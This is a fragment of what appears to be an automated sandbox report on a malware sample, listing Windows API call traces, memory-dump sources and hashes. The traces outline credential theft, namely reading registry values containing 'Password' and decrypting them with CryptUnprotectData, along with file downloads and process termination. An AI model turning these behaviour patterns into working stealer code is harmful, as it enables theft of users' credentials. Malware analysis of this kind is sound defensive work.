                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: cedc0c31a4f3d6ec95ffa2931be9f07c8a724febb0f5cf52db28c4f42e624a7c
                                  • Instruction ID: 2ed5480cb69b9739f078b67c8bf0a1b726da0effe527581c1116fc91e970da82
                                  • Opcode Fuzzy Hash: cedc0c31a4f3d6ec95ffa2931be9f07c8a724febb0f5cf52db28c4f42e624a7c
                                  • Instruction Fuzzy Hash: E8513D75A10209AFDB10EFA4DC89EEEB7B9EF48310F104129F905E7251DB74AE15CBA4
                                  APIs
                                  • lstrcat.KERNEL32(?,011CE2B0), ref: 002CE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE07D
                                  • lstrcat.KERNEL32(?,?), ref: 002CE098
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0AC
                                  • lstrcat.KERNEL32(?,011BBA68), ref: 002CE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0D4
                                  • lstrcat.KERNEL32(?,011CD8D0), ref: 002CE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: adeae5cd87fa82c84eaf15ddc95141024d7f7787780a7cdf353c1ef17f91a390
                                  • Instruction ID: 1a5258f973b0fcf49e3ddce758de682f30f619bdcd5d3228b6007e64f45f6f14
                                  • Opcode Fuzzy Hash: adeae5cd87fa82c84eaf15ddc95141024d7f7787780a7cdf353c1ef17f91a390
                                  • Instruction Fuzzy Hash: F561907192021CEBCF55DF64CC84BDDB7B4BF88300F5049A8A64AA7291DB709F958F90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6AFF
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B6B2C
                                  • StrCmpCA.SHLWAPI(?,011CE9C8), ref: 002B6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 002B6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002B6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002B6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002B6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002B6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 002B6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6C17
                                  • InternetCloseHandle.WININET(?), ref: 002B6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: fdd76d4e7209e1e026ac6bc109a676e43f908a783dafeaed1efb46b1429ceda7
                                  • Instruction ID: d405bc2b41cb875b810509d82b2c29b7b87495efaef75d415e5760c8884f1b9b
                                  • Opcode Fuzzy Hash: fdd76d4e7209e1e026ac6bc109a676e43f908a783dafeaed1efb46b1429ceda7
                                  • Instruction Fuzzy Hash: 10419471610205ABDF20DF64DC89FEE7778EB04744F104568FA05EB281DF74AD548BA8
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,002C4F39), ref: 002D4545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D454C
                                  • wsprintfW.USER32 ref: 002D455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 002D45CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 002D45D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 002D45E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: 9O,$%hs$9O,
                                  • API String ID: 885711575-839828205
                                  • Opcode ID: 34637bfb54688060b165bf81fd50cef9a11e4810258368c0e66511680a0ee43b
                                  • Instruction ID: 2523c75fa2755aea591edd39e1c8e5010ea9b35f97ddda4b465015cd6c6da096
                                  • Opcode Fuzzy Hash: 34637bfb54688060b165bf81fd50cef9a11e4810258368c0e66511680a0ee43b
                                  • Instruction Fuzzy Hash: EC316171A10245BBDB10DFE4DC85FDE7778EF44700F104169F605EB281EB706A558BA9
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BBC1F
                                  • lstrlen.KERNEL32(00000000), ref: 002BBC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BBC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BBC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BBCAC
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002BBD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 0539d7e7f352e269888bd486676042ea9d64d0af75495cdfb07b32f90aae62b7
                                  • Instruction ID: 4aad487aea5bcbdf88e95eb7ac8cad50cca4f59c5a32423aa38e19af00408850
                                  • Opcode Fuzzy Hash: 0539d7e7f352e269888bd486676042ea9d64d0af75495cdfb07b32f90aae62b7
                                  • Instruction Fuzzy Hash: 10A16030621206CFDB26DF28D989AEEB7B0AF44344F28806DE449DB362DB75DC65CB54
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 002D6014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 002D609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D60D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: c07840ba5b148c01016c582d48cf3f3bee4aa8141da0012a4eba7e6d74673c34
                                  • Instruction ID: bbca0997cda92ca0046327c4c973a61cdce843088df1235c020866d49a480cda
                                  • Opcode Fuzzy Hash: c07840ba5b148c01016c582d48cf3f3bee4aa8141da0012a4eba7e6d74673c34
                                  • Instruction Fuzzy Hash: 3661B070B30544DFDB18CF5CC894A6EB7BAFF85305B24490AE4928B781C7B1EDA08B95
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE07D
                                  • lstrcat.KERNEL32(?,?), ref: 002CE098
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0AC
                                  • lstrcat.KERNEL32(?,011BBA68), ref: 002CE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0D4
                                  • lstrcat.KERNEL32(?,011CD8D0), ref: 002CE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 68a5f89fc5fc1547dc413d5c5d505a2564bfaea83dfa4a436e32ecb1d7ca6824
                                  • Instruction ID: 7549df034b22f1ea0e203490e6c959a115b7af457288795407afe19ae062514e
                                  • Opcode Fuzzy Hash: 68a5f89fc5fc1547dc413d5c5d505a2564bfaea83dfa4a436e32ecb1d7ca6824
                                  • Instruction Fuzzy Hash: 1A418F71920118DBCF25EF64DC89ADD73B4BF48300F544AA8F64AA7251DB709FA98F90
                                  APIs
                                    • Part of subcall function 002B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002B7805
                                    • Part of subcall function 002B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 002B784A
                                    • Part of subcall function 002B77D0: StrStrA.SHLWAPI(?,Password), ref: 002B78B8
                                    • Part of subcall function 002B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B78EC
                                    • Part of subcall function 002B77D0: HeapFree.KERNEL32(00000000), ref: 002B78F3
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002B7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 002B7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B7AF0
                                  • wsprintfA.USER32 ref: 002B7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B7B47
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002B7B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: 50f480731543d90bcc59a4c93678a38b3dcdcabcd730b341ca27ed792f693d0b
                                  • Instruction ID: 7ed5b38a787ab05469b5f096e057192d904334ba42b9e2695b52a271e0fa9835
                                  • Opcode Fuzzy Hash: 50f480731543d90bcc59a4c93678a38b3dcdcabcd730b341ca27ed792f693d0b
                                  • Instruction Fuzzy Hash: 1831C272A20254AFCF10DF68DC849EAB779EBC4754B14452DE50AA7341DB70ED10DBA4
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8243
                                  • lstrlen.KERNEL32(00000000), ref: 002C8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8297
                                  • lstrlen.KERNEL32(00000000), ref: 002C82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C82EB
                                  • lstrlen.KERNEL32(00000000), ref: 002C8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8337
                                  • lstrlen.KERNEL32(00000000), ref: 002C8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: daa96a387c16adbd64f8a5610ebd5d3b0394c3ec015b72773948bec17f91e17c
                                  • Instruction ID: 0470601672eceba24282d2c40dddb0cc73f935518b56b05f00d047ef3b9a1860
                                  • Opcode Fuzzy Hash: daa96a387c16adbd64f8a5610ebd5d3b0394c3ec015b72773948bec17f91e17c
                                  • Instruction Fuzzy Hash: 6B518F71520643DBEB10DF28D998BAAB7A4EF04740F118668ED46EB245DF34ED60CBE0
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002B7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 002B784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 002B78B8
                                    • Part of subcall function 002B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 002B775E
                                    • Part of subcall function 002B7750: RtlAllocateHeap.NTDLL(00000000), ref: 002B7765
                                    • Part of subcall function 002B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002B778D
                                    • Part of subcall function 002B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 002B77AD
                                    • Part of subcall function 002B7750: LocalFree.KERNEL32(?), ref: 002B77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B78EC
                                  • HeapFree.KERNEL32(00000000), ref: 002B78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 002B7A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
